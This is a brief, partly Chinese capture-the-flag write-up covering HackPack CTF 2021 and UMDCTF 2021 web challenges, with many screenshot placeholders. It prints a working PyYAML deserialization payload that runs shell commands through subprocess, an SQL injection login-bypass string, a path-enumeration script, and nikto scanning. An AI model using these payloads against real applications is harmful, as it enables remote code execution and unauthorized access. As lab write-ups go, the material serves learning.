HackPack CTF 2021

Yaml-2-Json

image-20210418101006020

没看到提示!

浅谈PyYAML反序列化漏洞

image-20210418101204802

image-20210418101252859

直接环境变量里有! tmp/flag.txt有问题!访问500

image-20210418102307195

哦!

Sweet, so let’s go for RCE and read our flag from the server

I used the following payload at first but it fails since subprocess will only accept single commands like whoami, id

user_input: !!python/object/apply:subprocess.check_output ['cat /tmp/flag.txt']

My teammate Koimet helped me refine my payload to the following which gives us the flag

user_input: !!python/object/apply:subprocess.check_output
       args: [ cat /tmp/flag.txt ]
       kwds: { shell: true }

image-20210418102804740

Indead v2

是xxe + Docx

但是我的有点问题!不能直接读取! 我是外带报错带出来的!

UMDCTF 2021

The Matrix

感觉是robot ag伪造!

但是咋不行啊!

Googlebot User Agents

image-20210418113910457

image-20210418113629142

他有个303跳转! 🙄🙄🙄

我说咋一直不行呢!

Return of the Flag Bay

sql注入

image-20210418122151838

image-20210418122404928

但是有一点问题! 不知道后端咋写的!

admin 任意

password 1'/**/or/**/1%23
是可以的!
但是

admin是
adminaaaaa'/**/or/**/1%23

password任意不行!

The Matrix Revolutions

居然用dirb扫目录! 是国外的网站! 没想到

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time    : 2021/4/20 11:03
# @Author  : upload
# @File    : mrctf.py
# @Software: PyCharm

import requests
import re
url = 'http://chals5.umdctf.io:4002/'
flag = ''
if __name__ == '__main__':

    for i in range(0,30):

        new_url = url+str(i)
        print(new_url)
        r = requests.get(url=new_url).text
        if re.findall('<!DOCTYPE.*?',r):
            break
        flag += r
        print(flag)

Top of the Charts

日了!

I think the success has gone to its head.

-I参数向服务器发出 HEAD 请求,然会将服务器返回的 HTTP 标头打印出来。

$ curl -I https://www.example.com

原来他说到Top 是这个意思! 🙄🙄🙄

nikto -h http://chals5.umdctf.io:4003

nikto 漏扫工具!国内用的少!

IOT Project

看项目记录! commits记录的修改信息

image-20210420121002492